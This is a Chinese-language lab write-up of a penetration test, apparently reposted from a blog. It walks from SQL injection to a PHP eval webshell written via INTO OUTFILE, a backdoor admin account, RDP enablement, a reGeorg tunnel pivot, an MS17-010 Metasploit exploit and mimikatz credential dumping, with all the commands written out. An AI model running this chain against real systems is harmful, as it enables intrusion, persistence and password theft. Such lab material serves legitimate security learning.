一次內網滲透測試實驗過程


0x01 滲透測試過程

通過滲透網站拿到webshell,然后通過webshell拿到網站主機系統權限,發現受害主機有兩張網卡,另一張網卡下有兩台存活的內網主機,然后我們就嘗試滲透存活的內網主機看能不能拿到系統權限,最后發現兩台內網主機都開啟了445端口,然后搜索了一下445端口漏洞發現有個最新的m17_010可能可以利用,結果真的通過ms17_010成功獲得了內網主機的權限。

目標網站ip:192.168.31.196

瀏覽網站通過手工測試發現http://url/hr/hr.php?hrid=15處有注入點

嘗試利用sqlmap工具跑一下這個注入點,看能不能注出有用的信息

通過測試發現這個注入點果然可以進行注入

然后利用該注入點進行嘗試注出網站后台登錄賬號密碼

發現跑出來的網站后台密碼是用md5加密的,所以利用md5解密一下,發現只有兩個權限較低的密碼可以解密,而權限較高的admin賬號解不開。不過問題不大,先用登錄后台(后台登錄界面可以用御劍跑出來)看一下

利用御劍跑出的后台目錄里有個phpinfo頁面,說不定可以得到一些有用的信息

發現可以得到網站文件的絕對路徑

發現網站后台數據維護處可以執行sql語句,通過phpinfo頁面知道了網站絕對路徑,可以嘗試在此處寫入php一句話木馬

select "<?php eval($_POST[123456]);?>" into outfile "/UPUPW_AP5.2/vhosts/jy.test.com/321.php" 

發現可以執行成功

嘗試用蟻劍(菜刀也可以)連接,發現成功連接

利用蟻劍虛擬終端創建一個用戶並將其加入到管理員組

net user ddd 123456 /add
net localgroup Administrators ddd /add

然后開啟3389端口就可以通過3389端口遠程控制目標機了

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
 
 
 
         

用netstat -an命令查看發現成功開啟3389端口

用arp -a命令發現目標機有兩塊網卡,有一塊網卡是內網ip,我們開始嘗試滲透內網

0x02  內網滲透測試

目標機ip:192.168.238.129、192.168.238.130

kali攻擊機ip:192.168.31.119

1. 測試思路

因為我們已經成功getshell了ip為192.168.31.196的主機,而238段的內網ip是它的另一塊網卡下的主機,所以可以利用已經getshell的這台主機作為代理去滲透238段的主機

2. 滲透過程

利用蟻劍在該網站根目錄上傳一個reGeorgSocksProxy的php腳本文件

設置kali的proxychains代理地址和端口,命令:vi /etc/proxychains.conf將dynamic_chain前的#去掉

設置代理地址和端口后:wq退出

配置好后通過reGeory來打通本地和目標的通道,出現如下畫面則連接成功

python reGeorgSocksProxy.py -p 9050 -l 0.0.0.0 -u http://192.168.31.196/tunnel.php
 
 
 
         

本地所有工具都可通過目標服務器進一步攻擊所有工具使用命令前加 proxychains,這樣kali的所有工具就如同全部在內網那台getshell的服務器上

用nmap掃描內網的兩個ip開放的端口發現都有445端口,192.168.238.129為03系統 ,192.168.238.130為xp系統,這里以192.168.238.130這台主機為例

用msfconsole搜索發現445端口有一個ms17_010的漏洞,可以嘗試反彈shell

設置好利用ms17_010所需要的參數

use exploit/windows/smb/ms17_010_psexec  #切換到ms17漏洞模塊
set RHOST 192.168.238.130   #設置目標機ip
run   #開始連接

成功反彈到shell,然后就可以查看目標機的一些信息了

添加一個新用戶名賬號,發現成功添加

run getgui -u ding(用戶名) -p 123456(密碼)
 
 
 
         

利用mimikatz工具查看系統管理員賬號密碼

load mimikatz     #啟動mimikatz
msv     #查看管理員密碼hash
 
 
 
         

也可以利用mimikatz獲取到密碼明文

kerberos     #獲取管理員密碼明文
 
 
 
         

獲取到明文管理員賬號密碼后就可以開啟遠程桌面用管理員賬號密碼進行登錄系統了

成功遠程登錄到目標桌面


0x03 總結

1.通過手工測試發現http://192.168.31.196/hr/hr.php?hrid=15鏈接加單引號,SQL報錯,證明存在注入漏洞
2.通過sqlmap測試發現該鏈接存在注入,最終跑出用戶名和密碼hash值,將得到的密碼hash值進行MD5解密,且成果解密
3.通過御劍目錄掃描工具,發現存在admin和phpinfo.php 路徑
4.訪問admin目錄,該目錄是網站后台管理頁面,輸入用戶名和密碼即可進入后台
5.通過訪問phpnifo.php可發現網站的絕對路徑為c:\upupw_ap5.2
6.發現網站后台數據維護處可以執行sql語句,通過phpinfo頁面知道了網站絕對路徑,可以嘗試在此處寫入php一句話木馬
select "<?php eval($_POST[123456]);?>" into outfile "c:\upupw_ap5.2\vhosts\jy.test.com\321.php" 
7.通過蟻劍連接一句話,並通過命令虛擬終端添加用戶和到管理員組
net user ddd 123456 /add
net localgroup Administrators ddd /add
8.通過注冊表開啟3389端口
9.通過命令查看3389端口是開放的
netstat  -ano |find  "3389"
10.使用ipconfig/all命令,發現存在目標系統網絡存在雙網卡,一個網卡是192.168.31.196,另外一張網卡是192.168.238.130
10.使用命令探測存活主機,發現存在目標主機還存在192.168.238.129和192.168.238.130兩個存活主機
arp -a
13.將reGeorgSocksProxy的php腳本文件通過蟻劍上傳到目標系統中(192.168.31.196),並訪問鏈接
http://192.168.31.196/tunnel.php
14.設置kali的proxychains代理地址和端口,命令:vi /etc/proxychains.conf將dynamic_chain前的#去掉
socks4  127.0.0.1  9050
15.配置好后通過reGeory來打通本地和目標的通道,在攻擊機KALI下執行
python reGeorgSocksProxy.py -p 9050 -l 0.0.0.0 -u http://192.168.31.196/tunnel.php
16.通過proxychains加密msf進行攻擊
proxychains  msfconsole
14.使用scanner模塊掃描一下哪些機器可能存在ms17-010的漏洞,發現192.168.238.130存在ms17-010漏洞
msf>use auxiliary/scanner/smb/smb_ms17_010
msf>set rhosts 192.168.238.0/24
msf>set thread 20
msf>run
15.使用ms17-010模塊進行攻擊
msf>use exploit/windows/smb/ms17_010_psexec  
msf>set RHOST 192.168.238.130  
msf>run   
16.使用MSF進行信息收集
meterprter>getsystem  //進行提權
meterprter>getuid  //發現是system權限
meterprter>ifconfig
meterprter>run getgui -u ding(用戶名) -p 123456(密碼)  //添加一個新用戶名賬號
meterprter>load mimikatz     //啟動mimikatz
meterprter>msv     //查看管理員密碼hash
meterprter>kerberos     //獲取管理員密碼明文
16.獲取到明文管理員賬號密碼后就可以開啟遠程桌面用管理員賬號密碼進行登錄系統了


原文地址: https://blog.csdn.net/weixin_44991517/article/details/90718228



免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM